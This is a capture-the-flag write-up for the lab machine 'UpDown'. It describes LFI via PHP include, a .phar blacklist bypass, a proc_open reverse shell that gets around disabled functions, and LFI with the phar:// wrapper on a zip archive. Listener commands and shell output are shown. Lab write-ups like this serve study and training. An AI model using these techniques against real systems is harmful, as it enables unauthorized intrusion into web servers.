InfoSec LAB

UpDown_Exploitation

Created: 5 min read

Exploitation

following a directory fuzzing operation in the dev directory, a git repository was uncovered. upon retrieval to the kali machine, a thorough examination of the git directory revealed the existence of a new “admin panel” version of the target web application. this version features a file uploading capability designed for the bulk scanning of websites listed in an uploaded file. subsequently, several vulnerabilities were identified. local file inclusion (lfi) at the page parameter of the index.php file, attributed due to the improper utilization of the php include function. the file uploading functionality, outlined in the checker.php file and invoked by the index.php file, lacks adequate input sanitization. this oversight becomes particularly critical due to the omission of the .phar extension from the blacklist, rendering the application susceptible to potential exploitation. furthermore, an unexplored virtual host, namely dev.siteisup.htb, has been identified as hosting an updated iteration of the “admin panel” from the older instance at /dev/ directory. access to this specific admin panel requires a privileged header, specifically designated as special-dev: only4dev.

Additional measures were carried out to evaluate the previously mentioned Local File Inclusion (LFI) vulnerability and to further enumerate the PHP environment within the target web application. In the course of these investigations, it was revealed, via a remote file read operation utilizing the PHP Conversion Filter technique, that the “admin panel” version residing in the dev.siteisup.htb virtual host mirrors the content of the previously enumerated Git directory. Confirmation of PHP code execution was achieved through the PHP Filter Chain technique. However, this capability was notably restricted, as the output from phpinfo unveiled an extensive list set to the disable functions field, primarily those associated with remote code execution use of an external python script, [[updown_dev.siteisup.htb#check dangerous function ([dfunc_bypasser.py](https //github.com/teambi0s/dfunc-bypasser))|dfunc_bypasser.py]], facilitated an efficient scan of the phpinfo results, pinpointing a singular missing php function in the disabled functions list, proc_open, which could potentially be exploited for remote code execution. Moreover, going over the uploading feature with the extensive use of the .phar extension has confirmed the code execution with a small limitation due to the delegation taking place at the end of scanning, defined in the checker.php file

In the following sections, I will attempt to establish a shell session to the target system by making use of all the information gained above.

Arbitrary File Upload

Uploading the payload Due to the limitation from the extensive list set to the disable functions field, the payload contains a PHP reverse shell that solely relies on the PHP proc_open function Additionally, a few lines of “websites” are prepended for the checker.php file to scan, so that the payload will be alive while being invoked

There is the payload at the generated directory Clicking into it will invoke the reverse shell

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ nnc 9999       
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.177] 60784
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
updown
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.177  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:2ec1  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:2ec1  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:2e:c1  txqueuelen 1000  (Ethernet)
        RX packets 3561504  bytes 617896147 (617.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3532729  bytes 1691381320 (1.6 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 493236  bytes 25394712 (25.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 493236  bytes 25394712 (25.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the www-data account via exploiting PHP file upload

LFI via PHAR

Another way of establishing a foothold is through abusing the phar protocol in conjunction with the LFI As mentioned previously, PHAR is essentially PHP Archive much like JAR in Java the phar protocol supports the following format; phar://<PATH_TO_ARCHIVE>/<FILE>.

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ cp proc_open_shell.phar shell.php
┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ zip shell.blahblah shell.php    
  adding: proc_open_shell.phar (deflated 94%)

For this method, I will copy the previous payload to the shell.php file Then, I will archive the shell.php file to a “ZIP” file with an arbitrary extension to bypass the blacklist filter in the checker.php file

The shell.php file will be called via LFI from the index.php file with the included .php extension

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ file shell.blahblah 
shell.blahblah: Zip archive data, at least v2.0 to extract, compression method=deflate

Despite of the arbitrary extension, the shell.blahblah file is still recognized as a ZIP archive

Uploading the ZIP archive, containing the PHP payload

There it is! Instead of clicking into it, this archive file will be called via LFI

As the phar protocol is able to extract content of an archive, it can reach the archived PHP payload inside the shell.blahblah file and execute it

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.177] 53370
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
updown
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.177  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:2ec1  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:2ec1  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:2e:c1  txqueuelen 1000  (Ethernet)
        RX packets 3563133  bytes 618162513 (618.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3533997  bytes 1691514037 (1.6 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 493236  bytes 25394712 (25.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 493236  bytes 25394712 (25.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the www-data account via LFI with phar

Interactive Graph View

Backlinks